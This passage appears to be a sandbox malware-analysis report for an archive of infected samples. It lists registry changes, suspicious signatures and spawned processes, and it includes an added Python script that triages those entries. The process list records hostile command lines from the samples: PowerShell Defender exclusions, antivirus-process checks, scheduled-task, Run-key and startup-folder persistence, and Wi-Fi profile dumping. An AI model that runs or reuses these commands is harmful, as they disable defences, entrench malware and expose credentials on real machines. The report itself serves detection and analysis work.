| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).left = "1006" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 03000000010000000200000000000000ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
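Added example, not part of this report or of the sandbox that produced it: a Python triage pass over lines copied from this page, doing the two checks an analyst wants before working through the process list that follows. First, it ignores registry reads and reports only writes to policy and persistence keys: netsh.exe reads HKLM\SOFTWARE\Microsoft\NetSh every time it runs in order to load its helper DLLs, so the rows in the Netsh Helper DLL table above are consistent with the Wi-Fi discovery and are not by themselves evidence of helper-DLL persistence, whereas the EnableLinkedConnections write under Policies\System is. Second, it flags the Defender-exclusion and execution-policy-bypass PowerShell command lines and the copy-then-run batch pattern that appear under Processes. The rule names, the `Finding` class and the path-based ranking heuristic are this example's own; the sample rows and command lines are copied verbatim from this page.

```python
r"""Triage helper for behaviour tables of the kind shown in this report.

Added example (not part of the original report or of any sandbox product).
It reads two kinds of lines copied from this page: registry signature rows in
the report's table form (| Description | Indicator | Process | Target |) and
process command lines, and reports
  (a) registry *writes* to persistence/policy keys, ranked by whether the
      writing image lives outside the OS and Program Files trees, and
  (b) Defender-exclusion, execution-policy-bypass and copy-then-run patterns
      in command lines.
Reads (Key opened/queried/enumerated) are deliberately ignored: netsh.exe reads
HKLM\SOFTWARE\Microsoft\NetSh on every run to load its helper DLLs, so those
rows alone do not show helper-DLL persistence; only a write to that key would.
"""
import re
from dataclasses import dataclass

# Rows copied from the tables on this page (constructed sample input).
SAMPLE_ROWS = r"""
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
"""

# Command lines copied from the Processes list on this page (constructed sample input).
SAMPLE_CMDLINES = r"""
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
"C:\Windows\System32\cmd.exe" /c copy Hazards Hazards.cmd && Hazards.cmd
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\241127-xqsswsslej_pw_infected.zip"
"""

# One table row: | operation | indicator | process | target |
ROW_RE = re.compile(r"^\|\s*([^|]+?)\s*\|\s*([^|]+?)\s*\|\s*([^|]+?)\s*\|\s*([^|]+?)\s*\|\s*$")
WRITE_OPS = ("Set value", "Key created", "Key deleted", "Value deleted")
OS_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Keys whose modification is worth a finding on its own (rule name, key pattern).
SENSITIVE_KEYS = [
    ("run_key", re.compile(r"\\CurrentVersion\\Run(Once)?(\\|$| )", re.I)),
    ("system_policy", re.compile(r"\\CurrentVersion\\Policies\\System(\\|$| )", re.I)),
    ("netsh_helper", re.compile(r"\\SOFTWARE\\Microsoft\\NetSh(\\|$| )", re.I)),
    ("winlogon", re.compile(r"\\Windows NT\\CurrentVersion\\Winlogon(\\|$| )", re.I)),
    ("ifeo", re.compile(r"\\Image File Execution Options\\", re.I)),
]

# Command-line patterns (rule name, regex, high priority?). The copy-then-run rule
# needs the same base name on both sides: "copy X X.cmd && X.cmd".
CMD_RULES = [
    ("defender_exclusion", re.compile(r"Add-MpPreference\b.*-Exclusion(Path|Process|Extension)\b", re.I), True),
    ("execution_policy_bypass", re.compile(r"-(ExecutionPolicy|ep)\s+Bypass\b", re.I), False),
    ("copy_and_run_renamed_script", re.compile(r"\bcopy\s+(\S+)\s+\1\.(?:cmd|bat)\b.*&&\s*\1\.(?:cmd|bat)\b", re.I), True),
]


@dataclass(frozen=True)
class Finding:
    rule: str
    process: str
    evidence: str
    high_priority: bool


def parse_rows(text):
    """Return (operation, indicator, process, target) tuples for well-formed rows."""
    rows = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append(m.groups())
    return rows


def is_write(operation):
    return operation.startswith(WRITE_OPS)


def outside_os_dirs(image_path):
    # Ranking heuristic only: this report also shows a dropped C:\Windows\sysnldcvmr.exe,
    # so "inside the OS tree" must never be read as "benign".
    return not image_path.lower().startswith(OS_ROOTS)


def triage_registry(rows):
    findings = []
    for operation, indicator, process, _target in rows:
        if not is_write(operation):          # reads never count, see module docstring
            continue
        for rule, pattern in SENSITIVE_KEYS:
            if pattern.search(indicator):
                findings.append(Finding(rule, process, f"{operation}: {indicator}", outside_os_dirs(process)))
                break
    return findings


def triage_cmdlines(text):
    findings = []
    for line in text.strip().splitlines():
        image = line.split('"')[1] if line.startswith('"') else line.split(" ")[0]
        for rule, pattern, high in CMD_RULES:
            if pattern.search(line):
                findings.append(Finding(rule, image, line, high))
    return findings


def main():
    for f in triage_registry(parse_rows(SAMPLE_ROWS)) + triage_cmdlines(SAMPLE_CMDLINES):
        print(f"[{'HIGH' if f.high_priority else 'info'}] {f.rule:<28} {f.process}\n        {f.evidence}")


if __name__ == "__main__":
    main()
```

Run on the sample input it reports the two Policies\System writes by SeetrolCenter.exe and nothing for the NetSh rows, then the two Defender-exclusion command lines (each also carrying an execution-policy bypass) and the `copy Hazards Hazards.cmd && Hazards.cmd` launcher; the 7-Zip line produces no finding. To use it on a full report, replace the two sample strings with the copied tables and process list.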
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\241127-xqsswsslej_pw_infected.zip"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TestExe.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TestExe.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe'
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe"
C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp
"C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp" /SL5="$10446,3312183,56832,C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe
"C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe" -i
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe'
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Hazards Hazards.cmd && Hazards.cmd
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 33988
C:\Windows\SysWOW64\findstr.exe
findstr /V "EmergencyAdaptedResearchOrdinaryHeatherSuspendedHospitalsScanner" Cancer
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Oe + ..\Increases + ..\Independently + ..\Devon + ..\Hotels + ..\Automobile + ..\Albany + ..\Georgia + ..\Guess + ..\Funeral w
C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com
Paintball.com w
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url" & echo URL="C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url" & exit
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f"
C:\Windows\system32\reg.exe
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f"
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffdfc733cb8,0x7ffdfc733cc8,0x7ffdfc733cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1900 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=4976 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=5420 /prefetch:8
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\fcxcx.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\fcxcx.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe"
C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
C:\Windows\system32\audiodg.exe
"C:\Windows\system32\audiodg.exe"
C:\Windows\system32\msiexec.exe
"C:\Windows\system32\msiexec.exe"
C:\Users\Admin\AppData\Local\Temp\4F5E.tmp.ssg.exe
"C:\Users\Admin\AppData\Local\Temp\4F5E.tmp.ssg.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "MS Build Tools" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe
"C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
